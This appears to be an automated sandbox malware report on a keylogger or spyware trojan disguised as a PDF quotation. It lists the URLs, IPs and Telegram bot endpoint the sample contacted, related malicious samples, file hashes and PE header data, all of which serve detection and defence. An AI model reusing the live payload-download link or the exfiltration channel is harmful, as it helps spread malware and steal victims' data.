              104.21.48.1
              truefalse
                high
                ip.1010.filemail.com
                23.237.50.106
                truefalse
                  unknown
                  checkip.dyndns.com
                  132.226.8.169
                  truefalse
                    high
                    checkip.dyndns.org
                    unknown
                    unknownfalse
                      high
                      1010.filemail.com
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://reallyfreegeoip.org/xml/8.46.123.189false
                          high
                          https://1010.filemail.com/api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQYXbMA-s&pk_vid=8e2aec8f065dac991739952269c1eb95false
                          • Avira URL Cloud: safe
                          unknown
                          http://checkip.dyndns.org/false
                            high
                            http://1010.filemail.com/api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQYXbMA-s&pk_vid=8e2aec8f065dac991739952269c1eb95false
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://stackoverflow.com/q/14436606/23354QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.000000000339C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpfalse
                              high
                              https://github.com/mgravell/protobuf-netJQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpfalse
                                high
                                https://api.telegram.org/botRegAsm.exe, 00000004.00000002.2945027047.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://reallyfreegeoip.orgdRegAsm.exe, 00000004.00000002.2945027047.0000000002AFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://1010.filemail.com/api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQYQUOTATION_JANQUOTE312025#U00faPDF.scrfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.com/mgravell/protobuf-netQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpfalse
                                      high
                                      http://checkip.dyndns.orgRegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2945027047.0000000002ACC000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://1010.filemail.comQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.0000000003341000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://github.com/mgravell/protobuf-netiQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpfalse
                                          high
                                          https://reallyfreegeoip.org/xml/8.46.123.189lRegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://1010.filemail.comQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.000000000336F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://checkip.dyndns.comdRegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://stackoverflow.com/q/11564914/23354;QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpfalse
                                                high
                                                https://stackoverflow.com/q/2152978/23354QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2220258995.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2227023518.0000000007330000.00000004.08000000.00040000.00000000.sdmpfalse
                                                  high
                                                  https://reallyfreegeoip.org/xml/8.46.123.189dRegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://reallyfreegeoip.orgRegAsm.exe, 00000004.00000002.2945027047.0000000002AFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgdRegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://reallyfreegeoip.orgRegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://checkip.dyndns.comRegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://checkip.dyndns.org/dRegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.0000000003341000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2945027047.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://1010.filemail.com/api/file/get?filekey=8zF_HFRpmGlHEZLIRYVj6h6JKBX6AxrA97KbIRR0rZ0PqDaLJe3QQQUOTATION_JANQUOTE312025#U00faPDF.scr, 00000000.00000002.2212483137.000000000336F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://reallyfreegeoip.org/xml/RegAsm.exe, 00000004.00000002.2945027047.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2945027047.0000000002A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  132.226.8.169
                                                                  checkip.dyndns.comUnited States
                                                                  16989UTMEMUSfalse
                                                                  104.21.48.1
                                                                  reallyfreegeoip.orgUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  23.237.50.106
                                                                  ip.1010.filemail.comUnited States
                                                                  174COGENT-174USfalse
                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                  Analysis ID:1619040
                                                                  Start date and time:2025-02-19 14:19:45 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 5m 54s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Potential for more IOCs and behavior
                                                                  Number of analysed new started processes analysed:6
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:QUOTATION_JANQUOTE312025#U00faPDF.scr
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:QUOTATION_JANQUOTE312025PDF.scr
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winSCR@3/0@3/3
                                                                  EGA Information:
                                                                  • Successful, ratio: 50%
                                                                  HCA Information:
                                                                  • Successful, ratio: 84%
                                                                  • Number of executed functions: 180
                                                                  • Number of non-executed functions: 9
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .scr
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target QUOTATION_JANQUOTE312025#U00faPDF.scr, PID 7408 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  TimeTypeDescription
                                                                  08:20:37API Interceptor16201x Sleep call for process: QUOTATION_JANQUOTE312025#U00faPDF.scr modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  132.226.8.169T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  HUD03ES34ED2025.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  PRRKEHO.1187.85242545.250219.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  BAO SHUN Vessel Particulars.docx.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  new purchase order21125.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  Draft doc PI ITS15235.vbsGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  17399017864923eee8aa147822e3bb140bbbe25809ef78f182071adaecdfc4cd37ec741533789.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  rDlVVqet8gxlhLhd.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  046s01900330081250b4057885818022025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  104.21.48.1ZmK1CAc4VP.exeGet hashmaliciousFormBookBrowse
                                                                  • www.tumbetgirislinki.fit/4wrd/
                                                                  uI1A364y2P.exeGet hashmaliciousFormBookBrowse
                                                                  • www.lucynoel6465.shop/jgkl/
                                                                  QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                                  • www.lucynoel6465.shop/am6a/
                                                                  LLLLLLLLASSSEERRRR.ps1Get hashmaliciousFormBookBrowse
                                                                  • www.tumbetgirislinki.fit/k566/
                                                                  laserl.ps1Get hashmaliciousFormBookBrowse
                                                                  • www.lucynoel6465.shop/jgkl/?y2IHp=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpe8No0hPfAwO5oFY7qBV6wzFyOtp6qA==&iLy=Wfpx
                                                                  laserrrrrrrr.ps1Get hashmaliciousFormBookBrowse
                                                                  • www.tumbetgirislinki.fit/k566/
                                                                  DHL parcel.exeGet hashmaliciousFormBookBrowse
                                                                  • www.kdrqcyusevx.info/q64t/
                                                                  BIS_MT103 101T000000121121.exeGet hashmaliciousFormBookBrowse
                                                                  • www.newanthoperso.shop/y5uj/
                                                                  DDT-5080-ST233.exeGet hashmaliciousFormBookBrowse
                                                                  • www.sigaque.today/vyp9/
                                                                  r53YFSyurTyIZZMd.exeGet hashmaliciousFormBookBrowse
                                                                  • www.clouser.store/0izs/
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  reallyfreegeoip.org000027_A-000032.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  • 104.21.16.1
                                                                  T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.80.1
                                                                  redline stealer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.48.1
                                                                  1739956023252a745b42b553cdf7d78ac9ddd87cf1def79e972fdda0a89cc59317777d06c5280.dat-decoded.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.112.1
                                                                  SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.80.1
                                                                  DHl-Global-Documents.jsGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.32.1
                                                                  INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.32.1
                                                                  HUD03ES34ED2025.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.80.1
                                                                  Ziraat_Bankasi_Swift_Messaji.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.80.1
                                                                  REQ. NO.237.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.48.1
                                                                  ip.1010.filemail.comQUOTATION_JANQTRA01312025#U00b7PDF.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 23.237.50.106
                                                                  MeP66xi1AM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                  • 23.237.50.106
                                                                  https://www.filemail.com/t/cFCAI9C4Get hashmaliciousHtmlDropperBrowse
                                                                  • 23.237.50.106
                                                                  checkip.dyndns.com000027_A-000032.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 132.226.8.169
                                                                  redline stealer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 193.122.130.0
                                                                  1739956023252a745b42b553cdf7d78ac9ddd87cf1def79e972fdda0a89cc59317777d06c5280.dat-decoded.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 193.122.130.0
                                                                  SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 193.122.6.168
                                                                  DHl-Global-Documents.jsGet hashmaliciousMassLogger RATBrowse
                                                                  • 158.101.44.242
                                                                  INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 193.122.130.0
                                                                  HUD03ES34ED2025.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 132.226.8.169
                                                                  Ziraat_Bankasi_Swift_Messaji.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 158.101.44.242
                                                                  REQ. NO.237.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 132.226.247.73
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  CLOUDFLARENETUSb5.elfGet hashmaliciousUnknownBrowse
                                                                  • 1.1.1.1
                                                                  b6.elfGet hashmaliciousUnknownBrowse
                                                                  • 1.1.1.1
                                                                  b3.elfGet hashmaliciousUnknownBrowse
                                                                  • 1.1.1.1
                                                                  b2.elfGet hashmaliciousUnknownBrowse
                                                                  • 1.1.1.1
                                                                  b1.elfGet hashmaliciousUnknownBrowse
                                                                  • 1.1.1.1
                                                                  https://malvinasrock.com/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%202/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 104.21.27.125
                                                                  https://app.powerbi.com/view?r=eyJrIjoiZmVlZTQ2MzYtNjAyNC00NmIzLTljNjYtYmI2NDA2NjgzYTBkIiwidCI6IjcxOGNiYTc5LTYzNTAtNDMyZS04YjYwLTk2MDFiM2VhNDNiYSJ9Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                  • 172.67.74.152
                                                                  https://app.powerbi.com/view?r=eyJrIjoiZmVlZTQ2MzYtNjAyNC00NmIzLTljNjYtYmI2NDA2NjgzYTBkIiwidCI6IjcxOGNiYTc5LTYzNTAtNDMyZS04YjYwLTk2MDFiM2VhNDNiYSJ9Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                  • 104.26.13.205
                                                                  Order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                  • 104.21.16.1
                                                                  https://app.powerbi.com/view?r=eyJrIjoiZmVlZTQ2MzYtNjAyNC00NmIzLTljNjYtYmI2NDA2NjgzYTBkIiwidCI6IjcxOGNiYTc5LTYzNTAtNDMyZS04YjYwLTk2MDFiM2VhNDNiYSJ9Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                  • 172.67.74.152
                                                                  UTMEMUST#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 132.226.8.169
                                                                  HUD03ES34ED2025.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 132.226.8.169
                                                                  REQ. NO.237.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 132.226.247.73
                                                                  SecuriteInfo.com.MSIL.Kryptik.AIWZ.tr.17983.2263.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 132.226.247.73
                                                                  SecuriteInfo.com.Variant.Lazy.487114.10148.10604.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 132.226.247.73
                                                                  PRRKEHO.1187.85242545.250219.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 132.226.8.169
                                                                  PURCHASE ORDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 132.226.247.73
                                                                  BAO SHUN Vessel Particulars.docx.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 132.226.8.169
                                                                  new purchase order21125.bat.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 132.226.8.169
                                                                  Draft doc PI ITS15235.vbsGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 132.226.8.169
                                                                  COGENT-174USOrder confirmation.exeGet hashmaliciousFormBookBrowse
                                                                  • 154.23.184.218
                                                                  SOA OF DEC 2024 PT.BINEX.exeGet hashmaliciousFormBookBrowse
                                                                  • 149.104.35.122
                                                                  https://consulteoseulimite.online/shopee/Get hashmaliciousUnknownBrowse
                                                                  • 143.244.185.131
                                                                  https://adminatttse0n.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                  • 38.98.69.175
                                                                  zteGet hashmaliciousUnknownBrowse
                                                                  • 38.50.252.97
                                                                  Yboats.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  • 23.154.10.200
                                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                                  • 149.104.184.89
                                                                  Payment_Activity_0104_2025-2-17.vbsGet hashmaliciousUnknownBrowse
                                                                  • 143.244.220.80
                                                                  PO.exeGet hashmaliciousFormBookBrowse
                                                                  • 38.11.157.207
                                                                  Hilix.spc.elfGet hashmaliciousUnknownBrowse
                                                                  • 38.36.199.238
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  54328bd36c14bd82ddaa0c04b25ed9ad000027_A-000032.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  • 104.21.48.1
                                                                  T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.48.1
                                                                  redline stealer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • 104.21.48.1
                                                                  1739956023252a745b42b553cdf7d78ac9ddd87cf1def79e972fdda0a89cc59317777d06c5280.dat-decoded.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.48.1
                                                                  SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.48.1
                                                                  DHl-Global-Documents.jsGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.48.1
                                                                  INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.48.1
                                                                  HUD03ES34ED2025.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • 104.21.48.1
                                                                  Ziraat_Bankasi_Swift_Messaji.cmdGet hashmaliciousDBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 104.21.48.1
                                                                  REQ. NO.237.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 104.21.48.1
                                                                  3b5074b1b5d032e5620f69f9f700ff0e000027_A-000032.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                  • 23.237.50.106
                                                                  T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                                  • 23.237.50.106
                                                                  DOC0003791175SVD09164420250219PDF(56KB).COM.exeGet hashmaliciousQuasarBrowse
                                                                  • 23.237.50.106
                                                                  DUE INVOICES #97643592.htmGet hashmaliciousHTMLPhisherBrowse
                                                                  • 23.237.50.106
                                                                  SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • 23.237.50.106
                                                                  SAFEQ Cloud - Secure Print.msiGet hashmaliciousUnknownBrowse
                                                                  • 23.237.50.106
                                                                  DHl-Global-Documents.jsGet hashmaliciousMassLogger RATBrowse
                                                                  • 23.237.50.106
                                                                  INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  • 23.237.50.106
                                                                  Comprobante transferencia 5678373888272653688262553.exeGet hashmaliciousDarkCloudBrowse
                                                                  • 23.237.50.106
                                                                  #U56fe#U7247_20250218.exeGet hashmaliciousNitolBrowse
                                                                  • 23.237.50.106
                                                                  No context
                                                                  No created / dropped files found
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):5.12132533859282
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:QUOTATION_JANQUOTE312025#U00faPDF.scr
                                                                  File size:1'103'360 bytes
                                                                  MD5:4fc67d8dc05024c14e049d23487a84d7
                                                                  SHA1:f165b81184848163d0b7e26fb619ba679d53e0ca
                                                                  SHA256:daaf11fab5350a27cf390581bddac90cdd10be5263f341f8f553983ca684a1b1
                                                                  SHA512:fe9e6bf12312b6f5cab64b396c7981b9b3e9c433d5c5c8e4ff1fc0451adcbd06bdcfa0f7bf3582f475ef14eb3e242177e26cdf11e172e55d00a93ccd59643e71
                                                                  SSDEEP:12288:fYDzt/V97yIfTPWAwZUg10i0ZDn6dUp5dn:wDRdrWAgQi0ZDn6dUp5d
                                                                  TLSH:73352C5639B86525D797CB3280E3592087D7EFA257F6DE0D009439E80A323BF4BD3A52
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................... ............`................................
                                                                  Icon Hash:0e3333b0bbb3b035
                                                                  Entrypoint:0x4bd4c2
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x67B5BAE7 [Wed Feb 19 11:05:11 2025 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  NameVirtual AddressVirtual Size Is in Section
